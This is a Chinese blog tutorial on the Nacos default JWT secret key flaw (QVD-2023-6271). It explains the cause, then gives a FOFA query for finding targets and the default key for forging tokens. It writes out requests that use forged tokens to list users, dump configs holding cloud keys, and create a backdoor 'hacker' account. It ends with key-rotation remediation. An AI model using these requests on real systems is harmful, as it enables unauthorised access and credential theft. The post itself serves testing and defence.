漏洞实战(1)：NACOS默认密钥漏洞QVD-2023-6271

OneMoreThink

发布于 2024-10-15 11:43:30

1130

发布于 2024-10-15 11:43:30

1、原理

NACOS[1]，/nɑ:kəʊs/，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

在 <=2.2.0、<=1.4.4的版本中，NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789。

该密钥用于加密用户帐号，生成用户登陆后的身份令牌accessToken，类型是JWT[2]（JSON Web Token）。

攻击者可以使用默认密钥和常见帐号生成身份令牌，从而绕过身份认证，直接获得NACOS的访问权限。

2、危害

攻击者获得NACOS的访问权限后，会查看NACOS管理的所有配置文件，翻找里面的帐号密码，例如云服务的AKSK、Java程序的JDBC，从而获得对应服务的访问权限。

3、攻击

3.1、资产发现

搜索资产

FOFA[3]：app="NACOS"

查看版本

# 请求地址

/nacos/v1/console/server/state

# 响应示例

{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}

3.2、漏洞利用

部署服务

1、下载地址：2.2.0 (Dec 14, 2022)[4]、1.4.4 (Aug 8th, 2022)[5]

2、打开鉴权开关：将配置文件conf/application.properties中的 nacos.core.auth.enabled设置为on。

3.1、Linux中部署：配置环境变量export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64、开启服务bash bin/startup.sh -m standalone、关闭服务 bash bin/shutdown.sh。

3.2、Windows中部署：配置环境变量此电脑 - 属性 - 高级系统设置 - 高级 - 环境变量 – JAVA_HOME= C:\Program Files\Java\jdk1.8.0_361、开启服务bin/startup.cmd-m standalone、关闭服务bin\shutdown.cmd 。

生成accessToken

生成地址：JWT官网[6]

关键参数：

1、常见帐号：例如nacos、nac0s、nacosss、nacos1、admin

2、默认密钥：SecretKey012345678901234567890123456789012345678901234567890123456789

其他参数：

3、签名算法：HS256（HMAC SHA256，JWT默认）

4、过期时间：在Linux中使用命令date +%s -d '2024-03-10 00:00:00'生成过期时间

5、是否启用Base64编码：是（NACOS建议）

查看帐号：常用于渗透测试或漏洞扫描，证明漏洞存在。

# 请求地址（GET）

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74 &pageNo=1&pageSize=9&search=accurate

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

查看配置：常用于红蓝对抗，翻找帐号密码，获取更多权限。

# 请求地址（GET）

/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"740458855550423040","dataId":"aliyun.yaml","group":"DEFAULT_GROUP","content":"aliyun:\n    access-key-id: RzRRFE5tQqsxAieELkMDLTAI\n    access-key-secret: 52dW2iDdPzmddUBEDlKHej5uYddK89","md5":null,"encryptedDataKey":null,"tenant":"","appName":"","type":"yaml"}]}

创建帐号，登陆后台，查看配置：同红蓝对抗场景。

# 请求地址（POST）

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwOTk5MTEwOX0.h2WWx4rr9_pxbYzRe2Psrw5JDY3mKzXiUK-FhMKCkto&username=hacker&password=123456

# 响应示例

{"code":200,"message":null,"data":"create user ok!"}

4、防御

生成身份令牌accessToken需要两个关键参数：用户帐号、加密密钥。只需将默认的加密密钥修改掉，攻击者就无法伪造身份令牌，从而修复该漏洞。

以下内容参考Nacos 文档[7]中的自定义密钥部分，以及关于Nacos默认token.secret.key及server.identity风险说明及解决方案公告[8]。

修改默认密钥的位置

配置文件：conf/application.properties

默认密钥：

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

### 2.1.0 版本后    

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

修改默认密钥的注意事项

1、原始密钥长度不得低于32字符，推荐将原始密钥进行Base64编码，例如：

### 原始密钥（刚好32字符）

ThisIsMyCustomSecretKey012345678

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

### 2.1.0 版本后

nacos.core.auth.plugin.nacos.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

2、鉴权开关是修改之后立马生效的，不需要重启服务端。

3、动态修改token.secret.key时，请确保token是有效的，如果修改成无效值，会导致后续无法登录，请求访问异常。

4、密钥需要保持节点间一致，长时间不一致可能导致403 invalid token错误。